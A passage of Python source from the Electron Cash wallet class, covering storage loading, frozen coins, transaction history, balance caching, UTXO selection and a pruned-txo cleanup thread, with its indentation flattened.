self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Adddress objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up siince is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_height(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
assert isinstance(address, Address)
"effect of tx on address"
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
